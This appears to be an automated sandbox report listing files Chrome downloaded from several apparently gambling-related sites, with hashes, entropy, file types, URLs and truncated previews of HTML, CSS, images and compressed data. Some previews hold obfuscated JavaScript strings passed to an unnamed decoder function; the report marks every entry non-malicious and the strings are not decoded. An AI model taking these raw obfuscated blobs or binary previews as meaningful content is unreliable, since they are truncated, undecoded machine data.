                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgBYBdAGgG8AiAITgGoAXSgLgDMBXNGBgS3Uwak0pEAEoq7JCAAESBgCce3SgG4A8mABWIbgDoAJiFY80IAAryUEEPIYBPTMMoB9ZyCQBZFPvYAbEJQUAG5QvuwgzACEAAwAvqIqIfLS8gC8IJiU0TAQrJSipDyp5PpQDFBsnNx8aJji8iAM7PJo5DD6aGZlABbM8gZGUH4MugDC6HJQaCPtaAASKHKk0Lam8gAyPHLM2MSxsaQwKAC2EOwMIPrM5AcwDWWXlVy8/OJJ0gypDN1bQqnAJn0KGAugAygBpACSADkVBlKABGACCmgA5vlMroAPSUOhoOiULGAkAAD10miQ+V03xAtQ4zxqjnEIxWDDWmzkqTQulZ7K2DHi+1ISGKDTQhnkT2qr3I70+3y2ugAJHcQA8AKL+Y60wRoL4/JC6ZxSXysI0wAA+FoYKgaTRa0lqlH0PCCgXIk14MFGvigSCQzEorBQKAu8gAtLybBymAcFYbnL4BAaeVBVtH+aR6dLagx6o1mmhHZkXW6KDBff7mALRPFa8Lyl6AEq0iUAMTQAd2sUSaekUHSmQAagBVLEADgxPGFpEiCKzVReufE8N8AC8jPkRJl1ghfJD8gdnWUoOGguGYABWS8ANhg+BAN8CaD8vgS3MMrCGvk+UF0pIgFBbCQA5d33KUlwEIRxAOdcjAgxldRg+IVCAA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12770), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):48883
                                                                                                                                                          Entropy (8bit):5.895719351461312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:0u8tECCvnRM7cDkbzEUF+ac8qDASSSYu8n+niAVFD8TAdy9pmyQg8jUgFgi09/Ld:0sCaa7c4zEUF4TDASSSYJ+VVVOegN9Z
                                                                                                                                                          MD5:753C69F5B67A5DFE5CF11DDD01470304
                                                                                                                                                          SHA1:E81D212744CB7AA6453BA1EA7621D3DFF5C930BC
                                                                                                                                                          SHA-256:5FF3009B9DB304FC23897443B8249CBDA798CB417999517C5F295BB8CB8B32B7
                                                                                                                                                          SHA-512:E29963F1B911AA839BD194443F432146E85607923D0FF3C702524E8AB6894C318AB8E9CB3BBD5ECA3467046037F6C2F3E3327F20E8D4C08150AEE75018E5B608
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://856217.cc/
                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1">.. <meta property="og:description" content="Welcome">.. <title></title>.. <style>.. html,.. body {.. margin: 0;.. padding: 0.. }.... .retry {.. display: none;.. text-align: center;.. height: auto;.. width: 100%;.. line-height: 3rem;.. padding: 0 .5rem;.. box-sizing: border-box;.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. }.... .retry .btn {.. border: 1px solid #eee;.. border-radius: 4px;.. width: 120px;.. display: inline-block;.. font-size: 16px;.. cursor: pointer;.. box-sizing: border-box;.. }.... .retry .btn:hover {.. color: red;.. }.... .counts {.. color: red;.. display: inline-block;.. width: 24px.. }.... .iswx {..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (64218)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):477224
                                                                                                                                                          Entropy (8bit):5.353918779192261
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:tkUUEuK5a8lZkPUu6QUT63i6PSNhpgJY/KWkZTcxBBt2dxwXEASH44YeW4G0JL1D:SUUEuK5a8lZkP6QUT63i6PSNhpcTJU1W
                                                                                                                                                          MD5:E8507DA8CBB99F566F4779F53824B1BF
                                                                                                                                                          SHA1:74DB16E3986DA28A708BC8DCD876F86A4E27B17D
                                                                                                                                                          SHA-256:D81ED7BE6BFE699094ED2D8A54F351037BCAA81DAE878FF71C86B2C7439A6506
                                                                                                                                                          SHA-512:BE74FC5EED92A0508EA19FF3FE53BC85B2A0B90B6B516C7D4450C7D6A12ED5E526688E6E6B068308944A080D1B4212CD0A62C8860245D7E46A50E822C4987CD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Preview:@charset "UTF-8";.tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:before{box-sizing:content-box}.tutorial-body .add-members[data-v-e9757988],.tutorial-body .home[data-v-e9757988]{position:absolute;right:13px;top:50%;transform:translateY(-50%)}.tutorial-body .add-members.home[data-v-e9757988],.tutorial-body .home.home[data-v-e9757988]{right:17px}.tutorial-top[data-v-e9757988]{background:url(/pc/image-pc/tutorial/tutorial-bg.jpg) repeat-x 0 0;height:100px;width:100%;padding:15px 0;border-bottom:3px solid #007989}.tutorial-title[data-v-e9757988]{height:1px;background:#4d4d4d;width:342px;margin:30px auto 0;text-align:center}.tutorial-title h1[data-v-e9757988]{color:#faf4e0;font-size:24px;position:relative;top:-15px;background:#272727;width:154px;margin:0 auto;font-weight:900}.tutorial-main[da
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 31598
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6253
                                                                                                                                                          Entropy (8bit):7.965593985492808
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:QSkfG167Bu5ZrwzirEAgpc3xYxKOE5SSFdvB4+KICQVbh0TAjA5LYzLyrGYr+D:Hk7E5SziriKC06gdvq+K7Qh0EcYCrH6D
                                                                                                                                                          MD5:E666CF1062741A4581B58C2AE792D7EB
                                                                                                                                                          SHA1:255167DC4785FC969942025F42003834B2F24B1C
                                                                                                                                                          SHA-256:765C303DF0B554CAD00EEA0223262C1A4C201218CC6109393C16A70C3D748B6E
                                                                                                                                                          SHA-512:61C830F7C1637EFD149F59F63E9C2F9A3D0EF5F52989327B6B9B6F6205976E6DAFC47594387392F366F75808E5D912254133E129FC26281AD2B02791E3CBB3D2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/gui-skin-default.css
                                                                                                                                                          Preview:...........=k...q..+.....n......>.G.rhK|X$e}.....qvf13.....I.+..p...# ..._....$.m.....O....L?j.{R.................g._...7...-w...'.n.....}.M.U.Y[.~../....W/~.......~......../?../..3VK.?EI...n9.!)8\e.8.Y.2..E..!k...4@..q.{.3.;m\w.Pq5...$^..q.Z.......'_..?...?Z......<7A....e..(."dO..{2>..l>r.s....~X......i6.,O..,...v.`.....h<...%v./G......zi...o.h(...EQ.%n..1mQ&@h. .Y...Z....e.....(A...O.Y^.i..B4...*]...<r$...V..w.;\ehLho;..1...?...G'.....Fq...0v..../... ....l..~..F}...M>..a.fv..b...8..gh...3t.qYS...{2K.U..^.b=ys:.rqQ.LRoz.....r..'..yk..C6 .<..]e..k...i..[s%........+....h...E..O~5..ap..j..Q....w.,....h.gs&.cFC.'.7.SM.d.z....w.?..y.!.+.G.}..K......0....#/N\.0t.xO.....\...c.+.N.j.4. ..r.b.v...A...;....VT.P'.(.........4XSlGQ.,..WA..).L.Y..n<.M..fS.;.;...i<.Z.....g.E...5u..m..U....H...?k.K..hfDQa..Z.>...6..P.#.kn...69..%..f.I.......z..Y.....'..+tbU..,^..bO.+:.b.........[.v[..t.&6..f.X9.....!G,,. s..*...."..1.p. @...../B..i..]`.B.....T.:.@6..e.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17241
                                                                                                                                                          Entropy (8bit):2.6564108516880913
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:wSiYkEWmfURSBIM+ixNXrNGVmGvsc5ZGPUtU0vGeThlq:wSlk6kM+g5dUtUUJThlq
                                                                                                                                                          MD5:599B2B961205C6D17341FC6D04C94F05
                                                                                                                                                          SHA1:F597C4677D99DE6B79085F5FA245FF210B181DD6
                                                                                                                                                          SHA-256:F5F3A63CFD98BE1B993951A90C4E2E85F69CEF59D88FCF7E30C5B1881D83A2BE
                                                                                                                                                          SHA-512:2267486D65088D81571371CF8492996C3AFFA1043092F2773944358DB412DBED06EA557E51C7D327DE749822DAF629FB3F107C5179D499214C6C913B9427120C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_dg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs...............=JiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpRights:Marked>False</xmpRights:Marked>. <xmpMM:OriginalDocumentID>uui
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):607344
                                                                                                                                                          Entropy (8bit):4.128470592591836
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:bPk4iFRv77Gdibd43aH0vsDGMSwCh0auJaMdARZ6:Lk4iFRvPRbd4qH0vs1Ch8dARZ6
                                                                                                                                                          MD5:FA4C0311970214E27B69675D93948BEB
                                                                                                                                                          SHA1:502026061C0CB0972D44A9148C2B4EB99F964BED
                                                                                                                                                          SHA-256:BF0C77343E97DF13BCAE560BAFD5197A31EC93BF71E39505B9F11AC5DDB9DA4C
                                                                                                                                                          SHA-512:F87455CA3BF2F4EF5D9C293990C25D1DAA615EFB92978A5F73EDE239B55840EEE6A4635EDE9C1A7E3C4A514424AC2B87AC9297962FCD097A9157EEAF1462D43D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://e933002.com/
                                                                                                                                                          Preview:<!DOCTYPE HTML>.<html lang="zh-CN">.<head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge"/>. <meta name="renderer" content="webkit|ie-comp|ie-stand">. <title>....</title>.<link rel="bookmark" source-href="https://8vpfnx.eveday.me/ftl/commonPage/images/favicon/favicon_1768.png">.<link rel="shortcut Icon" source-href="https://8vpfnx.eveday.me/ftl/commonPage/images/favicon/favicon_1768.png"/>.<link rel="stylesheet" href="https://8vpfnx.eveday.me/ftl/commonPage/themes/gui-base.css">.<link rel="stylesheet" href="https://8vpfnx.eveday.me/ftl/commonPage/themes/gui-skin-default.css">.<link rel="stylesheet" href="https://8vpfnx.eveday.me/ftl/bwin1768/themes/style/common.css">.<link rel="stylesheet" href="https://8vpfnx.eveday.me/ftl/bwin1768/themes/style/bootstrap-dialog.min.css">.<script type="text/javascript">. var imgRoot='/fserver';.</script>. [if lt IE 9]>.<script src="/ftl/commonPage/js/html5.js"></script>.<![endif]-->.</head>.<body
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5028), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5028
                                                                                                                                                          Entropy (8bit):5.906072367166343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VdR5QM8hG+rCZuI1LuRUpP3WshS+VcDBF/n/uu0R4O55pKeAVFMZZXn:VPCG+/F6fWr+VmBW4O5+lDMZZ3
                                                                                                                                                          MD5:151CF415E97CA58C30839CEA2453E0FA
                                                                                                                                                          SHA1:F4F6015A695F114720EDE23CCC40B23801E26488
                                                                                                                                                          SHA-256:538094A518C7F967AC740CDCF1AECEDC16D9DA92F10058284A56E5652C6561F1
                                                                                                                                                          SHA-512:9BC304B6810B8EF81BC4341D39A1C7F6F37BD7B67F223095B2D13A105A74CD38616A96B3ACD595B3AB37E4F0D5809E243A7078B5AF6470D2D9723AC8AC684B24
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/loginByMobile.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBYB2AGgPwE4BdUgbwCJCA5QgVgYC4AzAVzRgAXAJbpMIUoNJIAlI15IQAAiSCATsKEMA3AHkwAKxBCAdABMQ3YWhAAFNSggg1ggJ6YpDAPpeQSALIoZrwANiAM9ABuUCG8IJwAhAAMAL4y2tFqSsIAvEiYDAAiZgAcwAwypCF5JmiYwpUoeQXMAJoAHroVpFDNRbwA9ABM3Wg5mCGYMph0KaT6RkKYKCYAtlAQAOIggoLOsjgMSKtIAEp+ggDKxuhmDNQylZPTs/OGxoLLaxv+vIJQInQBzoiiuJ3OqmuMFunCgJgAWml6GYUABhEKaOA8fhCUR1OSCAAWwiQJhJACFBGhCiSoGAwmYAD6MokkkwAEhAq2EnwYKPRmIqc2h/EEKOAaGxAkB+LomSUIByrKQ2mVJlBl3BFyht0wADYkpU1YpoWgzEgcgbSMBrOKTJd/JcvABJZgAFQAoqcAGoAQQAMnkds60Hs1NFJnxpXipnKoFlBDkbWaUMATN7/BzVCg1CATABzHZh0nHM7am5mgC0uG0ybtGazghzeehq25vMuHrdXgdTtOHsu3c7qN0zEKEUElTzGq1kIrZg8MjmuBA+CXpFzoKluLEBOJpIpVJpSDpDJyCVwpBgYXjIbDEcwddT9sdLvdXr9/qN+/VO01ZbnU0F0NFIkToCAHAgJBOGwBh1CgNAkBCAEQAADXuUgzABKBtxlWNc0EXg1DQEF52gpJSEPalaXpEAzESXBQOtAEYEJThSKA6Cox3OoQDkEAAD4kgAfjVKjj1POjzySTg1U3HYpjmUsISued2MJBCzDCNRcJjPi6EEkSPB/cSaLPZJJB/E1bgtPjZJ/eTPnXYQ2zo4QUMSVJhRQVYID+OjOGeGY5gWD4vnWLYi32aZYOU8sgPuR5SFWHZCSCaCgteUKlhWCLfn+GVgRnADVKA2EETA/kMXgXTdzoMSkE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):386
                                                                                                                                                          Entropy (8bit):7.229437500849335
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7m/6TusyTIZvrhmxotSUYeqKXTjyxRqc+vd3B0lN:b/6jNuq/v1B0lN
                                                                                                                                                          MD5:01EDDB92EFA6BDC6C2C753F4135E56CE
                                                                                                                                                          SHA1:6ADBDA924CC353F31765D15BDCEEE5C7E87C5142
                                                                                                                                                          SHA-256:23C1634818EB37B494933F9AE45C57E81547ABF93B5B573365CE4FB278B31EFE
                                                                                                                                                          SHA-512:D047209930F3BAFC5F418C8CE14C60761465DF4F562A76C89C906CDFB374710ED34803A8CE176963E867F4B12861FC4ED7DD1847E76C8ACF7C4A25F9E4201466
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR................a....pHYs................4IDAT8...K.Q......K. .._`..!p...I..%.....Ep.P.[Sc...T.......p...y.~..p.?.<..9.A$.E. "~G..Tx.>......]k.....Vr.#,t478.0.N._.W.z...O.A...+v...q..J.6..<....._x.j~^...M...>%.%.R~.W..j3..c..I..Vj.t.S...r....*`9}..C....$....!..3>..)V...7)..Q..b..x.j..2..."...J.......7i...+.6.oY.....gXD4.=.~D.&~..q.... f(......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):45166
                                                                                                                                                          Entropy (8bit):7.990234874518714
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:Mwd07uKcOmE+VKm6KOl53uyn5/3h4lJTjpUaWJ502amISF:MIVEZm6KOlN75/GbP2aWJ502amISF
                                                                                                                                                          MD5:D2DC7C733BFBE1F9CFEFC7C74F923735
                                                                                                                                                          SHA1:5BB30C2D07BF14B5E0293E3BD40EC30FFE61CB07
                                                                                                                                                          SHA-256:5CD1444248DD9233E02C89BBC5EEE082D5D8A1980263A3312E67B5EFF6BBF4E4
                                                                                                                                                          SHA-512:FB12907A3303032DFECDB4ACFAB59C72FD5069861A9B8F5DD54571AE4359321A8601953803F4135EBB1DE1535A70CE23AD262B212C7EB920E5C53A227E4AA55E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:4F2390D393A611EC97F8AE54E632C5A7" xmpMM:InstanceID="xmp.iid:4F2390D293A611EC97F8AE54E632C5A7" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B70E39BCDEB11E9AE98C341B6C88BB3" stRef:documentID="xmp.did:4B70E39CCDEB11E9AE98C341B6C88BB3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...)....IDATx..}.|\W.......f..-7.;.v.b..B...IH.......R.eY.,KI..!=..8q..5.K.d.>......7.y.L.e....Xo.~.{.w...Z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 19 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):475
                                                                                                                                                          Entropy (8bit):7.320862001098046
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7aH/6TXdMghNp6X6vZGPJgzzOKBGH0VlK87aRhWV:DH/6jS20YAJ6i87tV
                                                                                                                                                          MD5:D6EA5978CD32B85B13A19BA3F3366D1A
                                                                                                                                                          SHA1:2EB2528B4B76914C2D8B60F9B1CCE68083DB67B6
                                                                                                                                                          SHA-256:9F3C4D496D8B397A450CFA104710303D292D5A52275573DEED0FA65D47D4756A
                                                                                                                                                          SHA-512:139DF5D435F394C6E2BB03EC0806A02812A95F0BF0209CEAB9525E182382C9B2B7F1F61C49EB09C2287F1DEB7B8DCBB5314EE9796F718FC3A1581FBB48DDE24E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/top/icon_f_n.png
                                                                                                                                                          Preview:.PNG........IHDR................i....pHYs.................IDAT8...=..A.....^;%.(PIP Q.H6(....B.*.+.\.[.(.$.Q...).[..P....%....%...}..d.g.....|g....IJi.N`?..7..c....y.......".|.DD.4;.4D.0.m-"X..eYv..z..,.../...Q3{..UU....p..2.'\.yL.G...R.."..........qY..+..)p...fna+..ww3"*.2.1...P...R..q._.".o..xf.v7..b.SCD...2..;..U....*0."{..-"./..:.~.Q..............f...y....V..X.p...k.sC...8B6...EYD|.^..c0.".........a[>.pDL5;;92...'....L..R_.."....;b..+.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 33266
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9892
                                                                                                                                                          Entropy (8bit):7.972562696318712
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:AlehYXevG1OuZAPpHaU3WabIgwkhTiROULU+YODxuc4T8VsS5o9sAPPj5KO:bhGevKOyAP59byE+ROULU+YAp44sJ9sY
                                                                                                                                                          MD5:EE68D9C22FB7B678960A7C8E00814646
                                                                                                                                                          SHA1:605D82A011BA5BD9B71D95FFF45315E92800D46F
                                                                                                                                                          SHA-256:8AF5F843E2F8DA062B7BAE2F495260FB7246FE7CD9A8730D53739F4DE1A12B0C
                                                                                                                                                          SHA-512:E6A7D7C8AC23AA11F1C895C40FDA819BACB38F431B07EC6E32B2D1F02B25DB744F17F929BB3A8FB409A507C16DEF465776E7D1F94FE648CB4FD964961F747F50
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://x551005.com/message_zh_CN.js?v=1717580749344
                                                                                                                                                          Preview:...........=kSS...W(.].......:c.=.L..}....T*...:$1'.\.[...@@QDA....Pi......9I>..f....g.W........^k....\.f.t.........dG$.M..o.X....R...............CK8.Bk1W&.-kd..{...?5..5..+....d....K.v..R[._)N...>.5.W...Va.|=[}...4.=...$R...qg.>..>.e.......Ao......W.PF..............S.....S.n=.m,..........._..C..Ju.I-.smn..x..K.B....OS.(..s.G.....m..uk._3....#....S...'..|:`....r..Mv......x....V./l................|.\yH.<.j-,.v..J..VLS.e...>un=.H.u../.....`i......a..xm...._.....CKw.f..U.v!..28m.\yS....V.aDc...x...!.N'zC.x:.5.=k..).R.\..V..f..}.`.l.\*.-.....d.[..@.f.v..0g....I.F.G.xf......f~..[.....W..9....x.x..Z.yW_.2..a....=..Z.....5......z&..@x.<6.Ek..z..$z..=3.....&...g4'.a.=p"ep8TJyk.I}y.,=m....Z<....>.+.@[~PH.o....6...&...h.............8?p....5.6...V.....=.Y..}..'...gW..8...+....mA..Lc..)G..x2nt).!.V.w..'.........oM..ry4...,..p4.I..h&+[.N...v..*.';..+.T.C.%.BC..Z.....S:....D..G.st.h.R...z.^i.K......d-..@.!?p .0p..F.k.`.uL.M$.1....A...n}8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 21 x 19, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):426
                                                                                                                                                          Entropy (8bit):7.234803058415267
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7E/6T+TG9P5yKiam7OOvRwtJTGZ9MYAFBaF:5/6aGjlF0+tJTGvMYA2F
                                                                                                                                                          MD5:2632B0D08B13A16FA339EEF60042EB1B
                                                                                                                                                          SHA1:5763D0BEFD2B80C5DB3ECA3EBB34D54BA0017D87
                                                                                                                                                          SHA-256:32AC525BBC14EE8CBE070238864212AD1A26C52128E5E0FB4B558ADE21117B2B
                                                                                                                                                          SHA-512:6AD87638DF618310C95C7C32F62713ABE07575343FDB93700615B4EB33F6B816F00B9A4CD95695453F18860C8A4FBC19DCD8D8CE26D7F31CC8B6CF24BC5B92B7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR..............NF.....pHYs................\IDAT8...;K.A....n.E!(.lD.`.R$..(......F...Fb.:.".X.H*o.........$E@B..AQ.+X.cX.v.}`......93..A..e......J.....|.T.7W....^El..}.u.....2.F.E....(O.i..QS.8....j.z\.M.x.v..H..`.......!..=....{lKJ.....j......Iw|...j.........j..d..`.U.....X...?.Jyr.t.s...._.a..}:....j.Y..G......<.&^Dd.~.......aI....gx.C.}...f.B....n.v.........o$...oq......=..a.{....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):51232
                                                                                                                                                          Entropy (8bit):7.992867471799551
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:44LMlThhAPa4tw02goqSSnIndYvj28IuDuMpJ7xwOWnOLgk2xFzg50JV+Elih:7IlThhwa89KSIdYvjXIApZg3xidDh
                                                                                                                                                          MD5:4A084F1288CE5F22AF357A1142A9F568
                                                                                                                                                          SHA1:5EFD95DC448F2B69CA32A501B8185F5E74F71186
                                                                                                                                                          SHA-256:04860C104BA97F35CCF1AA4A7270443EF3A3D50CF27B47D8429E54369833BF98
                                                                                                                                                          SHA-512:AFFB08998E840D2366811FF27A12D56FC3B3B58D02F6266E16D113B18CEBF4B46D3A18BBA256AE1DB470EA10DCCE11775BAD0388D65729C1F94535A3421B887C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/mg/mg_game_01.png
                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:97D3F8DB7B7A11E8AF92FCDB9DAA5A93" xmpMM:DocumentID="xmp.did:97D3F8DC7B7A11E8AF92FCDB9DAA5A93"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:97D3F8D97B7A11E8AF92FCDB9DAA5A93" stRef:documentID="xmp.did:97D3F8DA7B7A11E8AF92FCDB9DAA5A93"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.....IDATx....$.y&..].j..t....x.....0.A....ZBZI....~..V.sZ.V")..$a.G.....q...o.FF...=.!...=%.iTUWeeF..~.g..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1980
                                                                                                                                                          Entropy (8bit):7.424368149402475
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2DSJ3/T/9yfYLHd0Da5C//FxfT13j9sJXu3tvGpJY:zo7F52ATVyfYLd0hJ9sJXu3dGpm
                                                                                                                                                          MD5:94165A858D58CCDF9C0EDE35D7B663E6
                                                                                                                                                          SHA1:B115210ED9038A73253708925F5D1E16DD68A74D
                                                                                                                                                          SHA-256:DCD5824C741533FD0345FB71E63F599B83F8B668E2C2BF7C12A8C48554C82728
